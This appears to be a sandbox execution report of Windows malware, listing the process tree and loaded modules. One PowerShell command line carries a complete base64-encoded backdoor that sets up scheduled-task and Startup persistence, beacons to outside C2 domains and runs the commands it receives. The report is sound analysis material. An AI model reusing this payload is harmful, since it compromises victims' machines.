C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\WindowsIndexingService.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

PID
2744
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHRqZmdkYnlpID0gJGVudjpQVUJMSUMgKyAiXExpYnJhcmllcyIKaWYgKC1ub3QgKFRlc3QtUGF0aCAkdGpmZ2RieWkpKSB7IG1kICR0amZnZGJ5aTsgfQokdmZhZXZodXl2ID0gJHRqZmdkYnlpICsgIlxXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLnZicyI7CiRhdnV4emh6ICA9ICIxMDA2LjEiOwokZmJ2eWdianQgPSAkZW52OnRlbXAgKyAiXEFGWDUwMDU4LnRtcCI7CiR0dmNoeXhqamlhICA9ICR0amZnZGJ5aSArICJcdGh1bWJjYWNoZV82NC5kYiI7CiRteXVybHBvc3QgPSAkZmFsc2U7CiR2Y2VidnViemR4ID0gInciOwoKZnVuY3Rpb24gaWFtd29yazJ7IHNjIC1QYXRoICRmYnZ5Z2JqdCAtVmFsdWUgJChHZXQtRGF0ZSk7IH07CmZ1bmN0aW9uIGd5aXV4emdkYncoICR3Z2RpaGNkZWYgKXsKICBpZiggJHdnZGloY2RlZiAtbWF0Y2ggJ091dE9mTWVtb3J5RXhjZXB0aW9uJyApewogICAgcmkgLVBhdGggJGZidnlnYmp0IC1Gb3JjZTsKICAgIGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzOwogICAgZXhpdDsKICB9Owp9CgpmdW5jdGlvbiBzZW5kcG9zdDIoICR3Z2RpaGNkZWYgKXsKICBpZiggISRteXVybHBvc3QgKXsgcmV0dXJuICRmYWxzZTsgfTsKICAkZmhpY2FnZyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7CiAgJGZoaWNhZ2cuQ3JlZGVudGlhbHMgPSBbU3lzdGVtLk5ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7CiAgJGZoaWNhZ2cuSGVhZGVycy5BZGQoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsKICAkZmhpY2FnZy5FbmNvZGluZyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjg7CiAgdHJ5ewogICAgJGF5enZzY2JkID0gJGZoaWNhZ2cuVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSRhdnV4emh6Jmd1aWQ9JHd1d3p1eHYmIiArICR3Z2RpaGNkZWYgKSApICkgKTsKICAgICRheXp2c2NiZCA9IFtzdHJpbmddW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoICRheXp2c2NiZCApICk7CiAgICBpZiggISR2Y2VidnViemR4ICl7IHJldHVybiAkZmFsc2U7IH0KICAgIGlmKCAkdndkdmN0aWljIC1lcSAkYXl6dnNjYmQuU3Vic3RyaW5nKDAsMTYpICl7CiAgICAgIHJldHVybiAkYXl6dnNjYmQuU3Vic3RyaW5nKDE2LCRheXp2c2NiZC5sZW5ndGgtMTYpIDsKICAgIH1lbHNlewogICAgICAkdmNlYnZ1YnpkeCA9ICRmYWxzZTsKICAgICAgc2VuZHBvc3QyICgiZXJyb3I9IiArIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkYXl6dnNjYmQgKSApICk7CiAgICB9CiAgfWNhdGNoewogICAgZ3lpdXh6Z2RidyAkXy5FeGNlcHRpb24uTWVzc2FnZTsKICAgICR2Y2VidnViemR4ID0gJGZhbHNlOwogICAgJGZoaWNhZ2cuVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSRhdnV4emh6Jmd1aWQ9JHd1d3p1eHYmZXJyb3I9c2VuZHBvc3QyOiIgKyAkbXl1cmxwb3N0KyI6IiskYXl6dnNjYmQgKyI6IisgJF8uRXhjZXB0aW9uLk1lc3NhZ2UgKSApICkgKTsKICB9OwogIHJldHVybiAkZmFsc2U7Cn07CgpmdW5jdGlvbiBoenlzYWhlc2IoICRhaml2Y3VkZ2ogKXsKICAkZ2ZjaGJ6dnQgPSAiaHR0cDovL2Nkbi51bml0eWNhcmVlcnMuY29tLyI7CiAgImhlZSIsInh1MSIsImhzMCIsImpkNSIsIm1xZiIgfCAleyAkZ2ZjaGJ6dnQgKz0gIiwiKyJodHRwOi8vIisgKCBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkXysgJChHZXQtRGF0ZSAtVUZvcm1hdCAiJXklbSVWIikgKSApLnRvTG93ZXIoKSApICsiLnRvcC8iOyB9OwogICRnZmNoYnp2dC5zcGxpdCgiLCIpIHwgJXsKICAgIGlmKCAhJG15dXJscG9zdCApewogICAgICAkbXl1cmxwb3N0ID0gJF87CiAgICAgIGlmKCAhKHNlbmRwb3N0MiAoJGFqaXZjdWRnaiArICImZG9tZW49JG15dXJscG9zdCIgKSkgKXsgJG15dXJscG9zdCA9ICRmYWxzZTsgfTsKICAgICAgU3RhcnQtU2xlZXAgLXMgNTsKICAgIH0KICB9OwogIGlmKCAkYWppdmN1ZGdqIC1tYXRjaCAic3RhdHVzPXJlZ2lzdGVyIiApewogICAgcmV0dXJuICJvayI7CiAgfWVsc2V7CiAgICByZXR1cm4gJG15dXJscG9zdDsKICB9IAp9OwoKaWYgKCBUZXN0LVBhdGggJGZidnlnYmp0ICl7CiAgaWYgKCAoICggTkVXLVRJTUVTUEFOIC1TdGFydCAoKEdldC1DaGlsZEl0ZW0gJGZidnlnYmp0ICkuQ3JlYXRpb25UaW1lKSAtRW5kIChHZXQtRGF0ZSkpLk1pbnV0ZXMgKSAtZ3QgMTUgKXsKICAgIHJpIC1QYXRoICRmYnZ5Z2JqdCAtRm9yY2U7CiAgICB0cnl7IGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzIH1jYXRjaHt9OwogICAgZXhpdDsKICB9ZWxzZXsgZXhpdDsgfTsKfTsKCmZ1bmN0aW9uIHliaWV1dmYoICRhaXZ1YXVqYiApewogIGlmKCAkYWl2dWF1amIgKXsKICAgIHNjIC1QYXRoICR0dmNoeXhqamlhIC1WYWx1ZSAoIFtndWlkXTo6TmV3R3VpZCgpLCAoIFtndWlkXTo6TmV3R3VpZCgpIC1yZXBsYWNlICctJywnJyApLlN1YnN0cmluZygwLDE2KSAgLWpvaW4gJywnICkgLUZvcmNlOyAgCiAgICBnaSAkdHZjaHl4amppYSAtRm9yY2UgfCAgJXsgJF8uQXR0cmlidXRlcyA9ICJIaWRkZW4iIH07CiAgICB0cnl7CiAgICAgICR3c2djaWh2ID0gW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzQXBwbGljYXRpb25TZXJ2aWNlLmxuayc7CiAgICAgIGlmKCAtbm90ICggVGVzdC1QYXRoICR3c2djaWh2ICkgKXsKICAgICAgICAkd3hnYmd5Y3ogPSBOZXctT2JqZWN0IC1Db21PYmplY3QgKCdXU2NyaXB0LlNoZWxsJyk7CiAgICAgICAgJGpjandmYnhpID0gJHd4Z2JneWN6LkNyZWF0ZVNob3J0Y3V0KCAkd3NnY2lodiAgKTsKICAgICAgICAkamNqd2ZieGkuVGFyZ2V0UGF0aCA9ICR2ZmFldmh1eXY7CiAgICAgICAgJGpjandmYnhpLldvcmtpbmdEaXJlY3RvcnkgPSAkdGpmZ2RieWk7CiAgICAgICAgJGpjandmYnhpLldpbmRvd1N0eWxlID0gMTsKICAgICAgICAkamNqd2ZieGkuRGVzY3JpcHRpb24gPSAnV2luZG93cyBBcHBsaWNhdGlvbiBTZXJ2aWNlJzsKICAgICAgICAkamNqd2ZieGkuU2F2ZSgpOwogICAgICB9CiAgICB9Y2F0Y2h7fTsKICAgICR3dXd6dXh2LCAkdndkdmN0aWljID0gKGdldC1jb250ZW50ICR0dmNoeXhqamlhKS5zcGxpdCgnLCcpOwogICAgJGZjZGd1ZXYgPSAic3RhdHVzPXJlZ2lzdGVyJnNzaWQ9JHZ3ZHZjdGlpYyZvcz0iKyhbc3RyaW5nXSRQU1ZlcnNpb25UYWJsZS5CdWlsZFZlcnNpb24pKyImcHN2ZXI9IisoICggKEdldC1Ib3N0KS5WZXJzaW9uICkuTWFqb3IgKSsgIiZjb21wX25hbWU9IiArICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE5hbWUpLk5hbWUudHJpbSgpICk7CiAgICBpZiggVGVzdC1QYXRoICggJHRqZmdkYnlpICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApICl7CiAgICAgIHJpIC1QYXRoICggJHRqZmdkYnlpICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApLCAoICR0amZnZGJ5aSArICJcV2luZG93c0luZGV4aW5nU2VydmljZS5qcyIgKSAtRm9yY2U7CiAgICAgIHRyeXsgc2NodGFza3MuZXhlIC9kZWxldGUgL1ROICJXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93cyBJbmRleGluZyBTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICBpZiggVGVzdC1QYXRoICggW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmxuaycgKSAgKXsKICAgICAgICByaSAtUGF0aCAoIFtFbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ1N0YXJ0dXAnKSArICdcV2luZG93c0luZGV4aW5nU2VydmljZS5sbmsnICkgLUZvcmNlOwogICAgICB9CiAgICB9CiAgICAkendkZ2V6eGIgPSBoenlzYWhlc2IgJGZjZGd1ZXY7CiAgICBpZiggJHp3ZGdlenhiIC1uZSAib2siKXsKICAgICAgcmkgLVBhdGggJHR2Y2h5eGpqaWEgLUZvcmNlOwogICAgICBleGl0OwogICAgfQogIH0KICByZXR1cm4gKGdldC1jb250ZW50ICR0dmNoeXhqamlhKS5zcGxpdCgnLCcpOwp9CiR2dXh0eGplZCA9IChzY2h0YXNrcy5leGUgL2NyZWF0ZSAvVE4gIldpbmRvd3NBcHBsaWNhdGlvblNlcnZpY2UiIC9zYyBEQUlMWSAvc3QgMDA6MDAgL2YgL1JJIDEzIC9kdSAyMzo1OSAvVFIgJHZmYWV2aHV5dik7IAppZiAoIFRlc3QtUGF0aCAkdHZjaHl4amppYSApewogICR3dXd6dXh2LCAkdndkdmN0aWljID0gIHliaWV1dmYgJGZhbHNlOwogIGlmKCAkdndkdmN0aWljLmxlbmd0aCAtbmUgMTYgICl7ICR3dXd6dXh2LCAkdndkdmN0aWljID0gIHliaWV1dmYgJHRydWU7IH0KfWVsc2V7CiAgJHd1d3p1eHYsICR2d2R2Y3RpaWMgPSAgeWJpZXV2ZiAkdHJ1ZTsKfQokbXl1cmxwb3N0ID0gaHp5c2FoZXNiOwp3aGlsZSggJHZjZWJ2dWJ6ZHggKXsKICBpYW13b3JrMjsKICB0cnl7CiAgICBpZiggJHZjZWJ2dWJ6ZHggLWFuZCAoJHZjZWJ2dWJ6ZHgubGVuZ3RoIC1ndCAzMCkgICl7CiAgICAgIGlleCAkdmNlYnZ1YnpkeDsKICAgIH07CiAgfWNhdGNoeyBneWl1eHpnZGJ3ICRfLkV4Y2VwdGlvbi5NZXNzYWdlOyB9OwogIFN0YXJ0LVNsZWVwIC1zIDI4MDsKICAkdmNlYnZ1YnpkeCA9IHNlbmRwb3N0MjsKfTsKcmkgLVBhdGggJGZidnlnYmp0IC1Gb3JjZTsK' ) );iex $a;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\rpcrtremote.dll
c:\windows\microsoft.net\framework64\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll

PID
1452
CMD
"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 13 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
2980
CMD
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\WindowsIndexingService.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

PID
2304
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHRqZmdkYnlpID0gJGVudjpQVUJMSUMgKyAiXExpYnJhcmllcyIKaWYgKC1ub3QgKFRlc3QtUGF0aCAkdGpmZ2RieWkpKSB7IG1kICR0amZnZGJ5aTsgfQokdmZhZXZodXl2ID0gJHRqZmdkYnlpICsgIlxXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLnZicyI7CiRhdnV4emh6ICA9ICIxMDA2LjEiOwokZmJ2eWdianQgPSAkZW52OnRlbXAgKyAiXEFGWDUwMDU4LnRtcCI7CiR0dmNoeXhqamlhICA9ICR0amZnZGJ5aSArICJcdGh1bWJjYWNoZV82NC5kYiI7CiRteXVybHBvc3QgPSAkZmFsc2U7CiR2Y2VidnViemR4ID0gInciOwoKZnVuY3Rpb24gaWFtd29yazJ7IHNjIC1QYXRoICRmYnZ5Z2JqdCAtVmFsdWUgJChHZXQtRGF0ZSk7IH07CmZ1bmN0aW9uIGd5aXV4emdkYncoICR3Z2RpaGNkZWYgKXsKICBpZiggJHdnZGloY2RlZiAtbWF0Y2ggJ091dE9mTWVtb3J5RXhjZXB0aW9uJyApewogICAgcmkgLVBhdGggJGZidnlnYmp0IC1Gb3JjZTsKICAgIGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzOwogICAgZXhpdDsKICB9Owp9CgpmdW5jdGlvbiBzZW5kcG9zdDIoICR3Z2RpaGNkZWYgKXsKICBpZiggISRteXVybHBvc3QgKXsgcmV0dXJuICRmYWxzZTsgfTsKICAkZmhpY2FnZyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7CiAgJGZoaWNhZ2cuQ3JlZGVudGlhbHMgPSBbU3lzdGVtLk5ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7CiAgJGZoaWNhZ2cuSGVhZGVycy5BZGQoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsKICAkZmhpY2FnZy5FbmNvZGluZyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjg7CiAgdHJ5ewogICAgJGF5enZzY2JkID0gJGZoaWNhZ2cuVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSRhdnV4emh6Jmd1aWQ9JHd1d3p1eHYmIiArICR3Z2RpaGNkZWYgKSApICkgKTsKICAgICRheXp2c2NiZCA9IFtzdHJpbmddW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoICRheXp2c2NiZCApICk7CiAgICBpZiggISR2Y2VidnViemR4ICl7IHJldHVybiAkZmFsc2U7IH0KICAgIGlmKCAkdndkdmN0aWljIC1lcSAkYXl6dnNjYmQuU3Vic3RyaW5nKDAsMTYpICl7CiAgICAgIHJldHVybiAkYXl6dnNjYmQuU3Vic3RyaW5nKDE2LCRheXp2c2NiZC5sZW5ndGgtMTYpIDsKICAgIH1lbHNlewogICAgICAkdmNlYnZ1YnpkeCA9ICRmYWxzZTsKICAgICAgc2VuZHBvc3QyICgiZXJyb3I9IiArIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkYXl6dnNjYmQgKSApICk7CiAgICB9CiAgfWNhdGNoewogICAgZ3lpdXh6Z2RidyAkXy5FeGNlcHRpb24uTWVzc2FnZTsKICAgICR2Y2VidnViemR4ID0gJGZhbHNlOwogICAgJGZoaWNhZ2cuVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5